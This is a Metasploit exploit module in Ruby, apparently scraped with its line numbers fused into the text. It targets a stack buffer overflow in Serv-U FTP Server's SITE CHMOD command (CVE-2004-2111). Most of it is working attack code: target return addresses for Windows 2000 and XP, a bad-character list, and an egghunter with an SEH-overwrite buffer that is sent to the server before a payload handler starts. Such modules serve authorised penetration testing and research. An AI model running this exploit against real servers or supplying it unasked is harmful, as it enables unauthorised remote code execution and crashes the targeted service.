Path: blob/master/modules/exploits/windows/ftp/servu_chmod.rb
19534 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Egghunter9include Msf::Exploit::Remote::Ftp1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Serv-U FTP Server Buffer Overflow',16'Description' => %q{17This module exploits a stack buffer overflow in the site chmod command18in versions of Serv-U FTP Server prior to 4.2.1920You must have valid credentials to trigger this vulnerability. Exploitation21also leaves the service in a non-functional state.22},23'Author' => 'theLightCosine',24'License' => MSF_LICENSE,25'References' => [26[ 'CVE', '2004-2111'],27[ 'OSVDB', '3713'],28[ 'BID', '9483'],29],30'Privileged' => true,31'DefaultOptions' => {32'EXITFUNC' => 'thread',33},34'Payload' => {35'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",36'DisableNops' => true,37},38'Platform' => 'win',39'Targets' => [40[41'Windows 2000 SP0-4 EN', {42'Ret' => 0x750212bc, # WS2HELP.DLL43'Offset' => 39644}45],46[47'Windows XP SP0-1 EN', {48'Ret' => 0x71aa388f, # WS2HELP.DLL49'Offset' => 39450}51]52],53'DisclosureDate' => '2004-12-31',54'DefaultTarget' => 0,55'Notes' => {56'Reliability' => UNKNOWN_RELIABILITY,57'Stability' => UNKNOWN_STABILITY,58'SideEffects' => UNKNOWN_SIDE_EFFECTS59}60)61)62end6364def check65connect66disconnect6768if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)69return Exploit::CheckCode::Appears70end7172return Exploit::CheckCode::Safe73end7475def exploit76c = connect_login77return if not c7879eggoptions =80{81:checksum => true,82:eggtag => "W00T"83}8485hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)8687buffer = "chmod 777 "88buffer << make_nops(target['Offset'] - egg.length - hunter.length)89buffer << egg90buffer << hunter91buffer << "\xeb\xc9\x41\x41" # nseh, jump back to egghunter92buffer << [target.ret].pack('V') # seh93buffer << rand_text(5000)9495print_status("Trying target #{target.name}...")9697send_cmd(['SITE', buffer], false)9899handler100disconnect101end102end103104105